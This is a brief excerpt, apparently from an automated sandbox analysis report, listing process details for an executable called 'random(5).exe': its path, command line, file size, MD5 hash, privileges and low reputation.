                                                  Path:C:\Users\user\Desktop\random(5).exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\random(5).exe"
                                                  Imagebase:0xe30000
                                                  File size:4'484'096 bytes
                                                  MD5 hash:F200A3445A8034D201EEB79BB29E1D73
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true
